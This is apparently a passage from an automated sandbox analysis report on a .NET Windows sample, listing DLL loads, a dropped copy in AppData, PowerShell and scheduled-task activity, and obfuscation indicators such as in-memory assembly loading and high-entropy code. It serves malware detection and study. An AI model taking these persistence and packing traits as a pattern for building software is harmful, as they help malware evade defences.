                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: lZ8NRWShfC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: lZ8NRWShfC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: lZ8NRWShfC.exe, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: TmfmVKU.exe.0.dr, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, t68jHSoYAIlawlIG5e.cs.Net Code: dIF0FdCfhB System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.lZ8NRWShfC.exe.40f0200.6.raw.unpack, t68jHSoYAIlawlIG5e.cs.Net Code: dIF0FdCfhB System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.lZ8NRWShfC.exe.62b0000.11.raw.unpack, t68jHSoYAIlawlIG5e.cs.Net Code: dIF0FdCfhB System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 0_2_02D09C20 push 3802D993h; iretd 0_2_02D09C6D
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 0_2_02D05DFF push eax; iretd 0_2_02D05E29
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 0_2_04F14808 push esp; retf 0_2_04F14809
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_0636EFD8 push es; ret 8_2_0636EFD0
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_0636EFA0 push es; ret 8_2_0636EFD0
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 8_2_0636EFC0 push es; ret 8_2_0636EFD0
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 10_2_01A6D9C0 push esi; retf 10_2_01A6D9D9
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 10_2_01A65DFF push eax; iretd 10_2_01A65E29
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 14_2_0653E5CF push es; ret 14_2_0653E5E0
                    Source: lZ8NRWShfC.exeStatic PE information: section name: .text entropy: 7.914344938020503
                    Source: TmfmVKU.exe.0.drStatic PE information: section name: .text entropy: 7.914344938020503
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, FccI31gZs7ax4EMgc0.csHigh entropy of concatenated method names: 'Oa45d83JrX', 'dpL5JrHnyv', 'Bay9NSA4SR', 'KZZ9I6m8kE', 'Ufx5RO0WRn', 'bLu5fglnuo', 'QoQ5tIE2NR', 'vpI5Tm1oH5', 'LeG51aFNLK', 'swM5iw6g3W'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, FxZFjs4i7RkqaYNM30.csHigh entropy of concatenated method names: 'b0P5lCSL7w', 'QpS5wWvKwW', 'ToString', 'HdJ5r5OMqk', 'ELN5PeX7mp', 'ycn5n82U5Z', 'uxP5xQE8p3', 'vkk5vE8NhS', 'mV25hvXlUT', 'A205oClo1K'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, MIiEfhqr0fJrKWYxGY.csHigh entropy of concatenated method names: 'TNoxQi2nOb', 'jeZxOcjTHS', 'H1vnsyN905', 'tS8nCe0ISB', 'px6nUcP64f', 'tdXnpXdXmK', 'phlneLsGvn', 'hUcn2hM7tb', 'CysnMiJlsZ', 'yNpnaQTaAq'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, pmdfqZ0lSDhZhFlc0M.csHigh entropy of concatenated method names: 'zE7Ihr1DF7', 'HLsIoBO0ea', 'OORIlEtcPd', 'korIwv2IiE', 'oYxIWGYNUO', 'kGsIkWasNX', 'F84FEFzO4fZnljW9oJ', 'yTgFkSBG5aWYGtj61eV', 'eBUIIbg9SB', 'xPfIycBRVE'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, vr1DF7KsLsBO0eaics.csHigh entropy of concatenated method names: 'shAPT9VtDx', 'AgTP1O1NSf', 'IWNPiEYKGQ', 'vTHP4KqRgx', 'i6yPDqNhNh', 'x7IPgILM96', 't1dPurCFAT', 'oCEPdKrgpa', 'PnBPYRnjHR', 'mAYPJFMqjG'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, CvKhNyIIACZkd5dr9KT.csHigh entropy of concatenated method names: 'ToString', 'fblGy7tZx8', 'VS9G0LpQoq', 'DJkGcOMQDk', 'HL4GrJLjQS', 'e9oGP5xsgt', 'YWQGnJ3TXa', 'OA3Gxrv8TJ', 'EpDoHMC4chfe6HW9WN7', 'Odu5wlCW5CakG00voIl'
                    Source: 0.2.lZ8NRWShfC.exe.4149a20.5.raw.unpack, RCrC1iTb0BmAV5dmVp.csHigh entropy of concatenated method names: 'qavWa0ZGrV', 'IedWfTHK9j', 'ev1WTqMmWF', 'r6YW1QEb7o', 'M55WbC08Rn', 'zNTWsvwhVY', 'xjkWCO6OkJ', 'LhmWUuJi2h', 'sxDWpgU1tg', 'EthWeCkQ9A'
